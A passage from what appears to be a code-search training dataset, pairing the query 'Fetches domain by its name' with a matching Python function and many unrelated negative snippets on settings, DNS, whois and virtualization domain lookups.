KeyError\n self.value = old\n raise KeyError(new)\n finally:\n self.value_lock.release()", "def resetStoredDefaults( self ):\n keys= list( self._defDict.keys() )\n data= [ self._defDict[ aKey ] for aKey in keys ]\n \n self.prefObj.save( group= self.prefGroup, name= keys, data= data )\n self.resetSelfWithDefaults()", "def testDefault():\n\n conf = naiveConf.NaiveConf(exampleConfFname)\n oldX = conf.x\n conf.default('x', None)\n conf.default('Z', 5)\n\n assert conf.x == oldX\n assert conf.Z == 5", "def _restore_default(self):\n raise NotImplementedError(\"Should have implemented this.\")", "def set_properties(old, new, self_name=None):\n properties = {\n 'name': self_name if self_name else old.name,\n 'hostname': old.attrs['Config']['Hostname'],\n 'user': old.attrs['Config']['User'],\n 'detach': True,\n 'domainname': old.attrs['Config']['Domainname'],\n 'tty': old.attrs['Config']['Tty'],\n 'ports': None if not old.attrs['Config'].get('ExposedPorts') else [\n (p.split('/')[0], p.split('/')[1]) for p in old.attrs['Config']['ExposedPorts'].keys()\n ],\n 'volumes': None if not old.attrs['Config'].get('Volumes') else [\n v for v in old.attrs['Config']['Volumes'].keys()\n ],\n 'working_dir': old.attrs['Config']['WorkingDir'],\n 'image': new.tags[0],\n 'command': old.attrs['Config']['Cmd'],\n 'host_config': old.attrs['HostConfig'],\n 'labels': old.attrs['Config']['Labels'],\n 'entrypoint': old.attrs['Config']['Entrypoint'],\n 'environment': old.attrs['Config']['Env'],\n 'healthcheck': old.attrs['Config'].get('Healthcheck', None)\n }\n\n return properties", "def reinit (self):\n #for name, obj in inspect.getmembers (self):\n ## if isinstance (obj, RField):\n # self.keyvals[name] = obj.default\n inspect.getmembers (self)", "def _setCurrents(self, att, newdata):\n logger.debug(\"Func: _setCurrents\")\n\n self._currentsDict[att] = newdata\n self._saveUserPrefs(self._currentsDict)", "def _update_input_config(input_config,secret_key):\n\n for key in input_config.keys():\n if input_config[key].get('arguments') is None:\n input_config[key]['arguments'] = {'secret':secret_key}\n elif input_config[key]['arguments'].get('secret') is None:\n input_config[key]['arguments']['secret'] = secret_key", "def merge_default_from_dict(self, key, value, lists_only=False):\n pass", "def test_dictionary_update(self):\r\n vm = Dictionary.value_manager(None, None, {1:2, 3:4})\r\n assert not vm.changed\r\n vm.value = {4:5}\r\n assert vm.changed", "def old(self, old):\n\n self._old = old", "def update_transforms(self, old_transforms, new_transforms):\n updated_transforms = {}\n for new_key, new_value in new_transforms.items():\n #if not new_key in old_transforms.valus():\n # old_transforms[new_key] = new_key\n\n if new_value[1] == \"transitive\":\n try:\n #updated_transforms[{v: k for k, v in old_transforms.items()}[new_key]] = new_value[0]\n #updated_transforms[old_transforms[new_key]] = new_value[0]\n updated_transforms[new_key] = old_transforms[new_value[0]]\n except KeyError:\n updated_transforms[new_key] = new_value[0]\n\n elif new_value[1] == \"additive\":\n # Perhaps needs to be adjusted, made more sophisticated\n # so that a new character is introduced even if it wasn't in the current segment\n if new_value[0] not in old_transforms:\n updated_transforms[new_key] = new_value[0]\n else:\n updated_transforms[new_key] = add_character_symbol_suffix(new_value[0], auto=True)\n if self.storyline:\n self.storyline.add_character([updated_transforms[new_key]],[updated_transforms[new_key]])\n else:\n self.add_character([updated_transforms[new_key]],[updated_transforms[new_key]])\n else:\n raise ValueError(\"Must be additive or transitive transposition\")\n for old_key, old_value in old_transforms.items():\n\n if old_key not in updated_transforms:\n updated_transforms[old_key] = old_transforms[old_key]\n\n #updated_transforms = dict(old_transforms, **{key:old_transforms[new_transforms[key]] for key in new_transforms.keys()})\n return updated_transforms", "def _restore_default(self):\n self._data = self._default", "def test_020_change_settings(self):\n\n testflow.step(\"Modifying settings via CLI\")\n assert self.settings_cli.run(\n 'set',\n name='MESSAGE_OF_THE_DAY',\n value='Zdravicko',\n )[0], \"Failed to change MESSAGE_OF_THE_DAY setting\"\n\n testflow.step(\"Querying for modified setting\")\n show_out = self.settings_cli.run(\n 'show',\n name='MESSAGE_OF_THE_DAY',\n )\n assert show_out[0], 'Failed to run show command'\n assert 'Zdravicko' in show_out[1], 'Setting value was not changed'\n\n testflow.step(\"Modifying setting back to default\")\n assert self.settings_cli.run( # Change value back to default\n 'set',\n name='MESSAGE_OF_THE_DAY',\n value='',\n )[0], \"Failed to change MESSAGE_OF_THE_DAY setting to defaul value\"", "def get_diff(self, old, new, add_all):\n\n adds = []\n dels = []\n\n if old:\n oldcfg = old[0].get('config', '')\n else:\n oldcfg = ''\n\n if new:\n newcfg = new[0].get('config', '')\n else:\n newcfg = ''\n\n if oldcfg and not newcfg:\n dels = new\n elif (newcfg and not oldcfg) or add_all:\n adds = new\n else:\n hash_old = hash(oldcfg)\n hash_new = hash(newcfg)\n if hash_old != hash_new:\n adds = new\n\n return adds, dels", "def test_set_default(self):\n result = self.param_dict.get_config()\n self.assertEquals(result[\"foo\"], None)\n self.param_dict.set_default(\"foo\")\n self.assertEquals(self.param_dict.get(\"foo\"), 10)\n self.param_dict.update(\"foo=1000\")\n self.assertEquals(self.param_dict.get(\"foo\"), 1000)\n self.param_dict.set_default(\"foo\")\n self.assertEquals(self.param_dict.get(\"foo\"), 10)\n \n self.assertRaises(ValueError, self.param_dict.set_default, \"qux\")", "def test_save_updates_database(self):\n registration = self.extension.registration\n self.settings['test_new_key'] = 'Test new value'\n generated_dict = dict(self.settings)\n self.settings.save()\n\n self.assertTrue(registration.save.called)\n self.assertEqual(generated_dict, registration.settings)", "def _options_changed(self, name, old, new):\n if self.options_lock.acquire(False):\n try:\n self.options = new\n\n options = self._make_options(new)\n self._options_dict = {i[0]: i[1] for i in options}\n self._options_labels = [i[0] for i in options]\n self._options_values = [i[1] for i in options]\n self._value_in_options()\n finally:\n self.options_lock.release()", "def update(self, *args, **kwargs):\n super(ReadOnlyDict, self).update(*args, **kwargs) # pragma: no cover", "def test_rekey(self):\n old_key = b'0' * 32\n new_key = b'1' * 32\n\n old_encrypted = encrypt('message', key=old_key)\n new_encrypted = rekey(old_encrypted, old_key=old_key, new_key=new_key)\n\n assert decrypt(new_encrypted, key=new_key) == 'message'", "def link_into_dictionary(old_dictionary, old_keys, new_key):\n linked = dict()\n for old_key in old_keys:\n if old_key in linked:\n linked[old_key] = old_dictionary[old_key]\n del old_dictionary[old_key]\n old_dictionary[new_key] = linked\n return old_dictionary", "def change_key(self): \r\n dialog = QtWidgets.QFileDialog(self)\r\n dialog.setFileMode(QtWidgets.QFileDialog.AnyFile)\r\n if dialog.exec_():\r\n key_file = dialog.selectedFiles()[0]\r\n \r\n # load key file and create new Encryptor object\r\n try:\r\n self.encryptor.set_key_from_keyfile(key_file)\r\n # set field content\r\n self.field_key.setText(Path(key_file).name)\r\n self.label_chg_key.setText(\"Key loaded\")\r\n self.label_chg_key.setStyleSheet(\"color:#01ac2d\")\r\n self.field_pwd.clear()\r\n self.label_chg_pwd.clear()\r\n QtWidgets.QMessageBox.information(self, \"Key File Change\", \r\n (\"Your key file has been successfully loaded.\\n\\n\"\r\n \"You can now encrypt / decrypt files.\"))\r\n except Exception as e:\r\n QtWidgets.QMessageBox.critical(self, \"File Loading Error\", \r\n \"An error has occured during file loading:\\n\\n{}\".format(repr(e)))" ]
[ "0.65626293", "0.6550737", "0.6313369", "0.6242143", "0.61064005", "0.60898244", "0.6082216", "0.60713875", "0.5890576", "0.5830049", "0.58023095", "0.5726684", "0.5720197", "0.5707687", "0.56511974", "0.5633935", "0.5569308", "0.54979086", "0.5470096", "0.5455716", "0.54556596", "0.54504985", "0.54429936", "0.5403258", "0.53868246", "0.5380584", "0.5375586", "0.5365649", "0.5356054", "0.53555375", "0.53414404", "0.5340507", "0.53388953", "0.53343076", "0.5333159", "0.5332965", "0.5326262", "0.53053963", "0.5302935", "0.5296953", "0.5279093", "0.52626824", "0.5258244", "0.5255544", "0.52489215", "0.5239341", "0.52340084", "0.5229547", "0.5219141", "0.5219117", "0.5212065", "0.5211075", "0.5207885", "0.52035946", "0.51816976", "0.51738405", "0.51700395", "0.51605356", "0.5155824", "0.5149947", "0.51454204", "0.51243305", "0.512115", "0.51186615", "0.51147705", "0.5114194", "0.5112801", "0.5111021", "0.5107446", "0.5103729", "0.5099747", "0.5098742", "0.50954694", "0.5090381", "0.50899386", "0.5087486", "0.5076853", "0.5075803", "0.50680435", "0.5064139", "0.505927", "0.505416", "0.5041739", "0.5034924", "0.5027345", "0.50252676", "0.50229305", "0.5007178", "0.49989936", "0.4998228", "0.4992231", "0.49892554", "0.49887523", "0.4986316", "0.49815673", "0.4981342", "0.49797115", "0.4979382", "0.4977008", "0.4973622" ]
0.62328917
4
Fetches domain by its name
def get_by_name(name): return database.get_all(Domain, name, field="name").all()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _get_domain_for_name(self, name):\n domain = self.connection.lookupByName(name)\n return domain", "def lookup(self, domain_name, validate=True):\n try:\n domain = self.get_domain(domain_name, validate)\n except:\n domain = None\n return domain", "def lookup(self, domain_name, validate=True):\r\n try:\r\n domain = self.get_domain(domain_name, validate)\r\n except:\r\n domain = None\r\n return domain", "def get_domain(id):\n return query(WEB_EXAMPLE_BASE + f\"/classical/domain/{id}\")", "def _get_domain(self, name=None, domain_id=None):\n try:\n if name != None:\n domain = self.conn.lookupByName(name)\n elif domain_id != None:\n domain = self.conn.lookupByNamtoprettyxmle(domain_id)\n \n self.logger.debug('Get libvirt domain: %s' % name)\n return domain\n except libvirt.libvirtError, ex:\n self.logger.error(ex)\n raise VirtDomainMonitorError(ex)", "def find_domain(self):\n for network in self.network_set.all():\n if network.site:\n expected_name = \"{0}.{1}.mozilla.com\".format(self.name,\n network.site.get_site_path())\n try:\n domain = Domain.objects.get(name=expected_name)\n except ObjectDoesNotExist, e:\n continue\n return domain.name\n\n return None", "def domain(self, id_or_name):\n return DomainCollection(self.request).find(id_or_name)", "def get(cls, subdomain, name):\n return cls.get_by_key_name(subdomain + ':' + name)", "def __getattr__(self, name):\n if name in self.domains:\n return self.domains[name]\n\n raise AttributeError('No domain named %s found.' % name)", "def get_domain(self, row_id):\n cursor = self.connection.cursor()\n cursor.execute(\"\"\"\n SELECT domain FROM queries WHERE rowid=(?);\n \"\"\", (row_id,))\n return cursor.fetchone()[0]", "def _find_domain(self, domain_name: str) -> digitalocean.Domain:\n\n domain_name_guesses = dns_common.base_domain_name_guesses(domain_name)\n\n domains = self.manager.get_all_domains()\n\n for guess in domain_name_guesses:\n matches = [domain for domain in domains if domain.name == guess]\n\n if matches:\n domain = matches[0]\n logger.debug('Found base domain for %s using name %s', domain_name, guess)\n return domain\n\n raise errors.PluginError(f'Unable to determine base domain for {domain_name} using names: '\n f'{domain_name_guesses}.')", "def get_domain(self, service_name: str) -> str:\n\n # Retrieve Domain URL\n url = 'http://api.liveperson.net/api/account/{}/service/{}/baseURI.json?version=1.0'\n\n # Generate request\n r = requests.get(url=url.format(self.account_id, service_name))\n\n # Check request status\n if r.status_code == requests.codes.ok:\n return r.json()['baseURI']\n else:\n print('Error: {}'.format(r.json()))\n r.raise_for_status()", "def _get_domain(self, doid):\n SQL = render_template(\"/\".join([self.template_path,\n 'get_domain.sql']),\n doid=doid)\n status, res = self.conn.execute_2darray(SQL)\n\n if not status:\n return False, internal_server_error(errormsg=res)\n if len(res['rows']) == 0:\n raise ObjectGone(self.not_found_error_msg('Domain'))\n\n return res['rows'][0]['schema'], res['rows'][0]['domain']", "def _get_domain(self):\n self.ensure_one()\n domain = []\n return domain", "def get_domain(self, rel_name):\n return self._declaration[rel_name].domain_type", "def get_domain(cname = False, subreddit = True, no_www = False):\r\n domain = g.domain\r\n if not no_www and g.domain_prefix:\r\n domain = g.domain_prefix + \".\" + g.domain\r\n if cname and c.cname and c.site.domain:\r\n domain = c.site.domain\r\n if hasattr(request, \"port\") and request.port:\r\n domain += \":\" + str(request.port)\r\n if (not c.cname or not cname) and subreddit:\r\n domain += c.site.path.rstrip('/')\r\n return domain", "def get(domain_name=None):\n url = 'https://api.cloudns.net/dns/soa-details.json'\n\n params = Parameters({'domain-name': domain_name})\n\n return requests.get(url, params=params.to_dict())", "def getDomain(self):\n # ui = UrlInfo(url)\n # urlBytes = [ord(i) for i in url]\n host = self.url[self.host_head:self.host_tail]\n domain = self.url[self.domain_head:self.domain_tail]\n\n # domain = url[ui.getDomainHead():ui.getDomainTail()]\n m = re.match(self.ipUrlPattern, host)\n if m:\n domain = m.group(1)\n return domain", "def GetDomain(self, domainName):\n\n response = self.client.http_get(\"/v4/domains/%s\" % domainName)\n\n return parse_response(response, Domain)", "def domain(self):\n return self._get('domain', '/domain/', self.DOMAIN_DATA)", "def get_domain(url, tlds=tlds):\n\n url_elements = url.split('.')\n for i in range(-len(url_elements), 0):\n last_i_elements = url_elements[i:]\n\n candidate = \".\".join(last_i_elements)\n wildcard_candidate = \".\".join([\"*\"] + last_i_elements[1:])\n exception_candidate = \"!\" + candidate\n\n if (exception_candidate in tlds):\n return \".\".join(url_elements[i:]) \n if (candidate in tlds or wildcard_candidate in tlds):\n return \".\".join(url_elements[i-1:])\n\n raise ValueError(\"Domain not in global list of TLDs\")", "def info(self):\n\n return self.call(method='getDomain', args=[self.domainname])", "def getDomain(self, domain=None):\n if domain is None:\n domain = self.domain\n reply = self.rpc.getDomain(self.username,\n self.password,\n domain)\n if not isinstance(reply, dict):\n raise Exception(\"RPC returned error: \" + reply)\n return reply", "def get_domain():\n domain=\"\"\n for item in re.split(\"\\.\", env.host)[1:]:\n domain = domain + \".\" + item\n return domain.lstrip(\".\")", "def get_domain_name(self):\n return self.domain_name.get_text()", "def get_domain_name(self, DomainName: str) -> Dict:\n pass", "async def fetch_subdomain(self, subdomain: str):\n value = await self.http.check_subdomain(subdomain)\n if (value or {}).get('exists') is True:\n # currently this endpoint returns {} if the subdomain does not\n # exist, but just in case it eventually returns 204 or something,\n # we check more explicitly instead.\n if value.get('teamId'):\n using_subdomain = await self.getch_team(value.get('teamId'))\n elif value.get('userId'):\n using_subdomain = await self.getch_user(value.get('userId'))\n\n return using_subdomain\n\n else:\n return None", "def __resolve_domain(self, domain=''):\n _ip = []\n if self.__is_ip_address(domain):\n # print hostname + \" is IP address\"\n _ip.append(domain)\n return _ip\n r = dns.resolver.get_default_resolver()\n r.nameservers = ['8.8.8.8']\n #answers = dns.resolver.query(hostname, 'A')\n try:\n answers = r.query(domain, 'A')\n for rdata in answers:\n # print rdata.address\n _ip.append(rdata.address)\n except dns.resolver.NoAnswer:\n print \"no answer\"\n\n if domain.find(\"www.\") != 0:\n domain = \"www.\" + domain\n # print \"querying \" + hostname\n try:\n answers = dns.resolver.query(domain, 'A')\n for rdata in answers:\n # print rdata.address\n _ip.append(rdata.address)\n except dns.resolver.NoAnswer:\n print \"no answer\"\n # print(\"processed %s, it has %d ips.\" % (hostname, len(_ip)))\n\n return list(set(_ip))", "def domain_lookup(domain):\n # Create the required data dictionary for Host/Reputation\n api_data = {\n 'host': domain\n }\n response = http_request(endpoint=HOST_REPUTE_API, data=api_data)\n\n if response.get('errorNo') != 0:\n return_error('API Returned, {}:{}'.format(response.get('errorNo'), response.get('errorMsg')))\n\n return response", "def rdap_domain_lookup(url: str, http_client: Optional[Any] = None) -> PyWhoIs:\n whois = PyWhoIs._rdap_domain_from_url(url, http_client)\n return whois", "def get_domain(self, domain=None):\n _log.debug(\"get_domain\")\n try:\n _ca_conf = _conf.get(\"security\", \"certificate_authority\")\n if \"domain_name\" in _ca_conf:\n return _ca_conf[\"domain_name\"]\n except Exception as err:\n _log.debug(\"get_domain: err={}\".format(err))\n _log.debug(\"get_domain: Could not read security domain from config. [Security not enabled]\") \n _log.debug(\"get_domain: Domain not found in Calvin config, let's use supplied domain\")\n if domain:\n return domain\n else:\n raise Exception(\"get_domain: Domain not set anywhere\")", "async def aio_rdap_domain_lookup(url: str, http_client: Optional[Any] = None) -> PyWhoIs:\n whois = await PyWhoIs._aio_rdap_domain_from_url(url, http_client)\n return whois", "def get_domain(self) -> Domain:\n domain = Domain.empty()\n\n # If domain path is None, return an empty domain\n if not self._domain_path:\n return domain\n try:\n domain = Domain.load(self._domain_path)\n except InvalidDomain as e:\n rasa.shared.utils.io.raise_warning(\n f\"Loading domain from '{self._domain_path}' failed. Using \"\n f\"empty domain. Error: '{e}'\"\n )\n\n return domain", "def ask_for_domain():\n found = False\n\n # Keep asking until a valid domain has been entered by the user\n while not found:\n domain = u\"https://\" + input(u\"\\nEnter the Canvas domain of your institution:\\n$ https://\")\n found = helpers.validate_domain(domain)\n\n return domain", "def domain(s):\r\n res = r_domain.findall(s)\r\n domain = (res and res[0]) or s\r\n return domain.lower()", "def get(\n server_context: ServerContext, schema_name: str, query_name: str, container_path: str = None\n) -> Domain:\n url = server_context.build_url(\"property\", \"getDomain.api\", container_path=container_path)\n payload = {\"schemaName\": schema_name, \"queryName\": query_name}\n raw_domain = server_context.make_request(url, payload, method=\"GET\")\n\n if raw_domain is not None:\n return Domain(**raw_domain)\n\n return None", "def _get_domain_for_uuid(self, uuid):\n domain = self.connection.lookupByUUIDString(uuid)\n return domain", "def get_domain(self, response):\n parts = urllib.parse.urlparse(response.url)\n domain = parts.netloc\n return domain", "def get_domain(self):\n return self.domain", "def _get_domain_from_certificate_name(self, cert_name):\n # Remove Let's Encrypt prefix\n cert_name = cert_name.lstrip('le-')\n\n # Remove trailing numbers if present (as last 10 characters)\n name_fragments = cert_name.split('-')\n if len(name_fragments) > 1 and name_fragments[-1].isdigit():\n name_fragments = name_fragments[:-1]\n return '-'.join(name_fragments)", "def domain(self):\n return get_tld(self.url, fail_silently=True)", "def url_get_domain(url):\n\n url_tuple = urlparse.urlparse(url)\n return url_tuple[1]", "async def _async_query_domain() -> Domain | None:\n try:\n return await hass.async_add_executor_job(\n whois_query, entry.data[CONF_DOMAIN]\n )\n except UnknownTld as ex:\n raise UpdateFailed(\"Could not set up whois, TLD is unknown\") from ex\n except (FailedParsingWhoisOutput, WhoisCommandFailed, UnknownDateFormat) as ex:\n raise UpdateFailed(\"An error occurred during WHOIS lookup\") from ex", "def select_domain_by_id(conn, domainid):\n # open a cursor\n cur = conn.cursor()\n # sql\n sql = \"select * from domain where domainid > ?\"\n # execute the sql with bind parameters\n cur.execute(sql, (domainid,))\n # result of the query. The result is a list of rows\n # example [(1, 'domain1', 'daily'), (2, 'domain2', 'daily')]\n rows = cur.fetchall()\n return rows", "def domain_name(self) -> str:\n return pulumi.get(self, \"domain_name\")", "def domain_name(self) -> str:\n return pulumi.get(self, \"domain_name\")", "def parse_domain(url):\n domain_match = lib.DOMAIN_REGEX.match(url)\n if domain_match:\n return domain_match.group()", "def get_domain_of_page(page_url):\r\n db = connect()\r\n cursor = db.cursor()\r\n sql_statement = \"\"\"\r\n SELECT on_progress_domains.url\r\n FROM on_progress_pages INNER JOIN on_progress_domains ON on_progress_pages.domain_id = on_progress_domains.domain_id\r\n WHERE on_progress_pages.page_url = %(d)s\r\n \"\"\"\r\n try:\r\n cursor.execute(sql_statement, {'d':page_url})\r\n page = cursor.fetchone()\r\n except:\r\n cursor.close()\r\n db.close()\r\n raise RuntimeError(\"An Exception happened with the Database, make sure you are connected\")\r\n cursor.close()\r\n db.close()\r\n return page", "def get_domain(self):\n return self._domain", "def get_domain(url):\n a = urllib.parse.urlsplit(url)\n return str(a.scheme) + \"://\" + str(a.hostname)", "def domain(self):\n return self['domain']", "def get_domain_name(url):\n try:\n results = get_sub_domain_name(url).split('.')\n return results[-2] + '.' + results[-1]\n except:\n return ''", "def get_domain_id_by_domainurl(domain_url):\r\n db = connect()\r\n cursor = db.cursor()\r\n sql_statement = \"\"\"\r\n SELECT domain_id FROM `domains` WHERE domain_url = %(d)s\r\n \"\"\"\r\n try:\r\n cursor.execute(sql_statement, {'d':domain_url})\r\n page = cursor.fetchone()\r\n except:\r\n cursor.close()\r\n db.close()\r\n raise RuntimeError(\"An Exception happened with the Database, make sure you are connected\")\r\n cursor.close()\r\n db.close()\r\n return page", "def get_site(name):\n return sites[name]", "def resolve_domain(host: str) -> str:\n parts = host.split('.')[-2:]\n return ''.join(parts)", "def domain(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"domain\")", "def GetDomainName(self):\n try:\n return self.server.GetDomainName()\n except dbus.DBusException:\n return None", "def getDomain(self):\n return self.domain", "def get_domains(filename):\n with open(filename, 'r') as file:\n result = []\n for line in file.readlines():\n domain = line.strip()[1:]\n result.append(domain)\n return result", "def domain_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"domain_name\")", "def domain(url):\n if isinstance(url, str):\n domain_match = re.match(r'https?://(?:www\\.)?([^/]+)\\.[^/]+', url)\n return domain_match.group(1) if domain_match else ''\n else:\n raise ParseError('Invalid input for domain(): {}'.format(url))", "def get_concept_by_domain(self, domain_simple_name):\n res = self.db.engine.execute(GET_CONCEPT_OCCURRENCES.format(domain_simple_name)).fetchone()\n return res[0]", "def list_domain_names():\n pass", "def get_domain(self, axis_id):\n if axis_id in self.axes_domains:\n return self.axes_domains[axis_id]\n else:\n raise Exception('Unknow axis %s' % axis_id)", "def create_or_show_domain(name):\n manager = get_manager()\n domain_id = manager.resolve_domain_id(name)\n if domain_id:\n log(\"Domain '%s' already exists.\" % name, level=DEBUG)\n else:\n manager.create_domain(domain_name=name,\n description='Created by Juju')\n log(\"Created new domain: %s\" % name, level=DEBUG)\n domain_id = manager.resolve_domain_id(name)\n return domain_id", "def get_domain(self, email):\r\n try:\r\n return str(email).split('r@')[1]\r\n except:\r\n return None", "def filter_domain(name):\n def wrapped(request):\n \"\"\" Function used to filter request\n \"\"\"\n if request.environ.get('HTTP_HOST'):\n url = request.environ['HTTP_HOST']\n else:\n url = request.environ['SERVER_NAME']\n if url.lower() == name.lower():\n return True\n\n return False\n return wrapped", "def domain_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"domain_name\")", "def domain_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"domain_name\")", "def domain_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"domain_name\")", "def cloudfront_public_lookup(session, hostname):\n if session is None:\n return None\n\n client = session.client('cloudfront')\n response = client.list_distributions(\n MaxItems='100'\n )\n items = response[\"DistributionList\"][\"Items\"]\n for item in items:\n cloud_front_domain_name = item[\"DomainName\"]\n if item[\"Aliases\"][\"Quantity\"] > 0:\n if hostname in item[\"Aliases\"][\"Items\"]:\n return cloud_front_domain_name\n return None", "def getDomains(self, company):\n return self.db.getDomains(company)", "def _get_domain_for_node(self, node):\n domain = self.connection.lookupByUUIDString(node.uuid)\n return domain", "def get_possible_domain(self):\n return self.possible_domain", "def get_domain_of_url(url):\n try:\n request = Request(url)\n request.add_header('User-Agent', 'Resistance is futile')\n response = urlopen(request)\n response_url = response.url\n domain = urlparse(response_url).hostname\n return domain.lower()\n except:\n return \"URL_ERROR\"", "def domain_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"domain_name\")", "def domain_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"domain_name\")", "def domain_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"domain_name\")", "def get_service_by_domain_name(self, domain_name):\n try:\n service_details = self.storage_controller\\\n .get_service_details_by_domain_name(domain_name)\n if service_details is None:\n # as per latest change, get_service_details_by_domain_name\n # will return None if the service_details can not be found\n # for this domain\n raise LookupError\n except Exception:\n raise LookupError(u'Domain {0} does not exist'.format(\n domain_name))\n return service_details", "def getDomain(url):\n domain = string.replace(url,\"https://www.\",\"\")\n domain = string.replace(domain,\"http://www.\",\"\")\n domain = string.replace(domain,\"http://\",\"\")\n domain = string.replace(domain,\".com/\",\"\")\n domain = string.replace(domain,\".com\",\"\")\n return domain", "def domain(self) -> str:\n return pulumi.get(self, \"domain\")", "def domain(self) -> str:\n return pulumi.get(self, \"domain\")", "def get_domain_config():\n query = {\n \"type\": \"config\",\n \"action\": \"get\",\n \"xpath\": \"/config/devices/entry[@name='localhost.localdomain']/deviceconfig/system/domain\",\n }\n\n return __proxy__[\"panos.call\"](query)", "def get_company(self, name):\n return self.website.company.id", "def get_keystone_v3_domain_id(self, domain_name):\n LOG_OBJ.debug(\"Get the domain ID.\")\n\n _url = \"http://\" + self.host_ip + \":35357/v3/domains?name=\" + \\\n str(domain_name)\n _headers = {'x-auth-token': self.cloud_admin_info[\"token_domain\"],\n 'content-type': 'application/json'}\n _body = None\n\n response = self.request(\"GET\", _url, _headers, _body)\n\n if response is None:\n LOG_OBJ.error(\"No response from Server while getting the \"\n \"ID of domain\")\n print (\"No response from Server while getting the \"\n \"ID of domain\")\n return response\n\n if response.status not in [200, 201, 202, 203, 204]:\n LOG_OBJ.error(\"Get domain ID Failed with status %s and error \"\n \": %s\" % (response.status, response.data))\n print (\"Get domain ID Failed with status %s and error : %s\" %\n (response.status, response.data))\n return response.status\n\n output = json.loads(response.data)\n LOG_OBJ.info(\"Domain details : %s \" % output)\n if len(output['domains']) != 1:\n LOG_OBJ.debug(\"No. of domains with name %s is %s\"\n % (domain_name, len(output['domains'])))\n print(\"No. of domains with name %s is %s\"\n % (domain_name, len(output['domains'])))\n return\n\n return output['domains'][0]['id']", "def _get_cookie(self, name, domain):\n for cookie in self._cookiejar:\n if cookie.name == name and cookie.domain == domain:\n if cookie.is_expired():\n break\n return cookie", "def domain(cls) -> str:\n return f'{cls.name}.wikimedia.org'", "def getDomain(self, *args, **kwargs):\n\n return_json = dict()\n jdatas = list()\n try:\n result, name = is_file(kwargs.get('value')[0])\n if result:\n jdatas = [load_file(name)]\n kwargs['dump'] = False\n md5_hash = ''\n\n except IndexError:\n print('[-] Something going wrong')\n return\n\n if not jdatas:\n if isinstance(kwargs.get('value'), list) and len(kwargs.get('value')) == 1 and \\\n os.path.exists(kwargs.get(\"value\")[0]) and kwargs.get(\"value\")[0].endswith(\".txt\"):\n kwargs[\"value\"] = [domain.strip() for domain in open(kwargs.get(\"value\")[0], \"rb\").readlines()]\n elif isinstance(kwargs.get('value'), six.string_types):\n kwargs['value'] = [kwargs.get('value')]\n\n kwargs['value'] = [urlparse(domain).netloc.lower() if domain.startswith(('http://', 'https://')) else domain for domain in kwargs.get('value')]\n\n url = self.base.format('domains/')\n\n for domain in kwargs.get('value'):\n url = self.base.format('domains/{}'.format(domain))\n if kwargs.get('domain_post_comments'):\n url += '/comments'\n method = 'post'\n data = '{\"data\": {\"type\": \"comment\", \"attributes\": {\"text\": \"Lorem ipsum dolor sit ...\"}}}'\n elif kwargs.get('domain_get_comments'):\n url += '/comments'\n method = 'get'\n else:\n #url += '/' + kwargs['domain_get_relationships']\n self.params[\"relationships\"] = 'communicating_files,downloaded_files,graphs,referrer_files,resolutions,siblings,subdomains,urls'\n method = \"get\"\n jdata, response = get_response(url, apikey=self.apikey, method=method, params=self.params)\n jdatas.append((domain, jdata))\n\n if kwargs.get('return_raw'):\n return jdatas\n\n for domain, jdata in jdatas:\n if jdata.get('data'):\n jdata = jdata['data']\n\n if not (kwargs.get('return_json') or kwargs.get('return_raw')) and kwargs.get('verbose'):\n print('\\n[+] Domain:', domain)\n\n single_dict = (\n 'TrendMicro category',\n 'Dr.Web category',\n 'BitDefender category',\n 'Websense ThreatSeeker category',\n 'Alexa category',\n 'Alexa domain info',\n 'Alexa rank',\n 'Opera domain info',\n 'subdomains',\n 'siblings',\n )\n\n complicated_dict = (\n 'WOT domain info',\n 'Webutation domain info',\n )\n\n for key in single_dict:\n if jdata.get(key) and ((kwargs.get(key) or key in args) or kwargs.get('verbose')):\n if kwargs.get('return_json'):\n return_json.update({key: jdata[key]})\n else:\n self.print_key(key)\n if isinstance(jdata[key], list):\n print('\\t', '\\n\\t'.join(jdata[key]))\n else:\n print('\\t{0}'.format(jdata[key]))\n\n for key in complicated_dict:\n if jdata.get(key) and ((kwargs.get(key) or key in args) or kwargs.get('verbose')):\n if kwargs.get('return_json'):\n return_json.update({key: jdata[key]})\n else:\n self.__print_complex_dict(jdata, key, kwargs)\n\n if jdata['attributes'].get('whois') and ((kwargs.get('whois') or 'whois' in args) or kwargs.get('verbose')):\n if kwargs.get('return_json'):\n return_json.update({'whois': jdata['attributes']['whois']})\n else:\n print('\\n[+] Whois data:\\n')\n try:\n print('\\t', jdata['attributes']['whois'].replace('\\n', '\\n\\t'))\n except:\n try:\n print('\\t', jdata['attributes']['whois'].encode('utf-8', 'replace').replace('\\n', '\\n\\t'))\n except:\n print('Old version of python has some problems with converting chars to ansii')\n\n self._print_complex_dict(jdata['attributes'], 'categories')\n self.__parse_relationships(jdata['relationships'], domain)\n if kwargs.get(\"domain_get_comments\", False) is True:\n simple_list = (\n \"date\",\n \"tags\",\n \"text\",\n \"votes\",\n \"links\"\n )\n for block in jdata:\n print(\"[+] Comment ID: {}\".format(block[\"id\"]))\n for key in simple_list:\n if block.get(key) and ((kwargs.get(key) or key in args) or kwargs.get('verbose')):\n if kwargs.get('return_json'):\n return_json.update({key: block[\"attributes\"][key]})\n else:\n self.print_key(key, indent='', separator='\\t[+]')\n if key == \"date\":\n print('\\t', datetime_from_timestamp(block.get(key)))\n else:\n print('\\t', block.get(key))\n\n # ToDo\n #elif kwargs.get(\"post_post_comments\", False) is True:\n\n elif kwargs.get('domain_get_relationships', False):\n self._print_complex_dict(jdata['attributes'], 'categories')\n self.__parse_relationships(jdata['relationships'], domain)\n \"\"\"\n simple_list = (\n \"url\",\n \"last_final_url\",\n \"tags\",\n \"total_votes\",\n \"last_analysis_date\",\n \"last_analysis_stats\",\n )\n for block in jdata['attributes']:\n print(block)\n for key in simple_list:\n if block.get(key, \"\") and ((kwargs.get(key) or key in args) or kwargs.get('verbose')):\n if kwargs.get('return_json'):\n return_json.update({key:block[key]})\n else:\n self.print_key(key, indent='', separator='\\t[+]')\n if key == \"last_analysis_date\":\n print('\\t', 